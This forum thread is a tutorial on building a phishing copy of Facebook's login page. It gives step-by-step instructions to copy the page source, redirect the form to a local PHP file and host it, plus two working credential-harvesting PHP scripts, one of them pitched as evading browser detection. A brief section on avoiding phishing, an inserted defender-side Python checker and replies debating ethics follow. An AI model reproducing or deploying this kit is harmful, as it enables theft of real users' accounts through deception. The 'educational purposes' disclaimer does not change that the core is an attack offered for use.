
Tutorial How to create a phishing site like Facebook, Instagram, Twitter, etc.

mtcddppi

Honorary Poster
Good day! I don't know if this post is allowed here but I'm still hoping that the admins will authorize this. So, I'm going to show you how to create a phishing site or a fake website that will allow you to hack someone's account. Before I continue, let me first explain what phishing is. Phishing is an illegal attempt to obtain sensitive information like usernames, passwords, credit cards and other sensitive data by disguising as a real or trustworthy website. So, to make this kind of attack possible, we also need to use Social Engineering. Yes! You have to socialize with your victim and gain his/her trust to bait your attack. So how to create a phishing site?

Requirements:
  • Text Editor (I'm using You must register or login to view this.)
  • Web site to phish (I'll use Facebook as an example)
  • Social Engineering (What is You must register or login to view this.?)
  • Web hosting (There are a lot of web hosting. You can try You must register or login to view this. or 000Webhost but you can search for you to try another hosting sites).
  • Brain.exe

1. Go to Facebook website. Once you're there, do not log in or click anything. Make sure that the URL stays in phc.onl/#forbidden#.
2. Now, let's view the source code. To do that, Right click on your mouse and select View page source or use your keyboard and press CTRL + U.
3. A new tab will appear which is the source code of the Facebook log in page. Select all the code by pressing CTRL + A and then copy the source code by pressing CTRL + C.
4. Paste the source code on your text editor.
5. Once it's already pasted, press CTRL + F to find a keyword. Find action= and you will see a line like this:

[Image attachment 645410]

6. Delete the highlighted code (yellow) and replace it with whatever name you want that ends with .php file. In my case, I'm going to use login.php.
7. Save your code as index.html
8. Now let's create a new file and name it with the name that you indicated to action=. I used login.php so in my action=, it should be action="login.php". Whatever is the name of your .php file inside action="", that should be the name of your file.
9. Now let's write a PHP script that will allow us to fetch user's details like username and password.

SCRIPT:

<?php
header ('Location:-The site you are using- ');
$handle = fopen('usernames.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
}
fwrite($handle, 'rn');
fclose($handle);
exit;
?>

10. So let me explain to you the codes for our login.php.

We have header ('Location:-The site you are using- ');. This line of code will let the user redirect to whatever site you want them to jump after they clicked the log in button. for example: header('Location: google.com');. The user will redirect to google.com once he/she will submit the data.

We have $handle = fopen('usernames.txt', 'a'); which will create a file named usernames.txt once the user will submit their data. The a inside the fopen means this will open the usernames.txt for writing only.

We have
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
this will loop the $_POST data in each data that is submitted. Since $_POST is an array, we need to use foreach loop to tell the computer to loop the data every time the user will submit something. the $variable is the input text which is "username" and "password" while the $value is the value that the user is going to submit. so inside your usernames.txt, it should look like this:

username='blablabla'
password='passblablabla'

username='blablabla'
password='passblablabla'

username='blablabla'
password='passblablabla'


so it's kinda like that. Then we have
fwrite($handle, 'rn');
fclose($handle);
exit;


this code will create another line (the rn) and then closes the text file. Now upload this to any web hosting sites. If you have VPS like Azure or Google Cloud, you can also use that. just install a Xampp for your apache and mysql service. This will allow you to host your own website locally. you can also portforward it. Azure is already port forwarded the port 80 and the Google Cloud as well. If you want to learn how to host using these VPS, try to read my post here: https://phcorner.net/threads/739767

You will learn how to host your own with that thread that I created. If you have more questions, don't hesitate to message me or post a comment. Oh, before I forget, the script for login.php may be detectable on Google Chrome or in any web browser. To make it undetected, we will create a database and table for that. If you want to learn how to create a database and table, use You must register or login to view this. as your reference. Note that the YouTube video is using Xampp. Once you have learned how to create a database and table using Xampp, you should be able to learn how to create a database and table on the web hosting sites. So the script for your undetectable phishing should be like this:

<?php

$conn = mysqli_connect('localhost', 'root', 'Kismet09198288658', 'test');

if(isset($_POST)) {

$email = $_POST['email'];
$password = $_POST['pass'];

$query = mysqli_query($conn, "INSERT INTO users(email, password) VALUES('$email', '$password')") or die(mysqli_error($conn));

if($query) {
header('location: index.html');
}
}

?>


let me explain it to you. $conn = mysqli_connect('YOUR HOST', 'YOUR DB USER NAME', 'YOUR DB PASSWORD', 'YOUR DB'); this will allow you to connect to your database that you just created. if(isset($_POST)) to check if the $_POST data is submitted or not. $email = $_POST['email']; and $password = $_POST['pass']; is the POST data which is used by Facebook. $query = mysqli_query($conn, "INSERT INTO users(email, password) VALUES('$email', '$password')") or die(mysqli_error($conn)); this will insert the submitted data from your victims to your database. make sure that you created a table named users with a column of email and password.

To avoid:
Our internet world is huge, and over time technology will evolve, security as well as hacking technology. There are a lot of ways to prevent phishing attacks but I will give you a very simple solution that won't make you sweat. Using your router and You must register or login to view this., we can avoid this kind of attack. So how to use this OpenDNS? It's very simple. You will just add a DNS to your router. Most routers nowadays have a DNS feature that will allow you to add DNS. You will have to use 2 DNS:

208.67.222.222
208.67.220.220


Those DNS will protect you from any kind of attack. Not just that. It will allow you to filter some websites:

[Image attachment 645444]

You can also set your own settings with OpenDNS. Another way to avoid this is to make sure that the website is trusted. What I mean is that you should always check if the website is SSL protected. Not just that, make sure that the domain name is the real domain name of the website that you are surfing.
That's all. If you have any confusion, please feel free to contact me or post a comment.
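
The two checks from the "To avoid" part (HTTPS, and the real domain name), plus a check of where the password form actually submits, written as a defender-side script. This is an added example, not part of the original post; `TRUSTED_HOSTS`, the function and class names, and both sample forms are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption for this example: hosts the defender treats as genuine for the brand.
TRUSTED_HOSTS = {"facebook.com", "www.facebook.com", "m.facebook.com"}
# Constructed samples: a form posting to the brand's host, and a copy posting to a local script.
GENUINE = '<form action="https://www.facebook.com/login/"><input name="email"><input type="password" name="pass"></form>'
CLONE = '<form action="login.php"><input name="email"><input type="password" name="pass"></form>'


class LoginFormFinder(HTMLParser):
    """Collect the action attribute of every <form> that contains a password input."""

    def __init__(self):
        super().__init__()
        self._action, self._has_password = None, False  # None means "not inside a form"
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action, self._has_password = a.get("action") or "", False
        elif tag == "input" and self._action is not None and (a.get("type") or "").lower() == "password":
            self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._action is not None:
            if self._has_password:
                self.actions.append(self._action)
            self._action = None


def check_login_page(page_url, html, trusted=TRUSTED_HOSTS):
    """Return a list of findings; an empty list means none of the checks fired."""
    findings = []
    parts = urlsplit(page_url)
    if parts.scheme != "https":
        findings.append("page not served over HTTPS")
    if (parts.hostname or "").lower() not in trusted:
        findings.append(f"page host {parts.hostname} is not a trusted host")
    finder = LoginFormFinder()
    finder.feed(html)
    for action in finder.actions:
        # A relative action such as "login.php" resolves against the page's own URL.
        target = urlsplit(urljoin(page_url, action))
        if (target.hostname or "").lower() not in trusted:
            findings.append(f"password form posts to untrusted host {target.hostname}")
    return findings
```

An HTTPS padlock alone does not clear a page: the host and form-target checks still fire for a copy served over HTTPS from a different domain.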
 

mtcddppi

Honorary Poster
Sir, is phishing the thing where they scam people's info or FB accounts, like that?
Sir, phishing is creating a fake website or disguising as a real one. A scam is a different thing. If you are worried because you've been one of the victims of a phishing attack, I included some tips on how you can avoid it.
 

PHC-Earl

Eternal Poster
OK sir, noted. Sorry, I was victimized.
 

mtcddppi

Honorary Poster
No problem. If you want to avoid it, read my tips, sir, so that you won't be victimized again. I created this thread for everyone to know how phishing works, how hackers fetch their sensitive information, and how to protect themselves from this kind of attack.
 

PakERton

Honorary Poster
It is easy to make a phishing page and to victimize people with it, especially nowadays when so many people are on social platforms, where links or phishing links spread quickly. Nowadays, people tend to click without thinking about what the content of the link is, especially when the link has a nice caption.

But, please don't dare do it for your own good. Be a responsible programmer or well-versed man in the society.
 

mtcddppi

Honorary Poster
Sir, I did not create this thread just to teach them how to hack. In this thread, I explained how hackers do this, how they are able to gain access to sensitive data from their victims, and how to prevent this kind of attack. It's still up to the readers of my posts if they're going to use this to hack someone. I'm not responsible for that. I included the tips to make them secure. Please read the whole thread.
 

PakERton

Honorary Poster
Yes, I have read it. No worries, my concern here is for all who are reading and learning the content of your thread, TS :)
 

mtcddppi

Honorary Poster
BTW I'm a programmer. Used to do programs and sites. Thanks for educating them with your knowledge.
Cheers. This content is for educational purposes only. Still, it's up to the readers if they're going to use it in harmful ways.
 
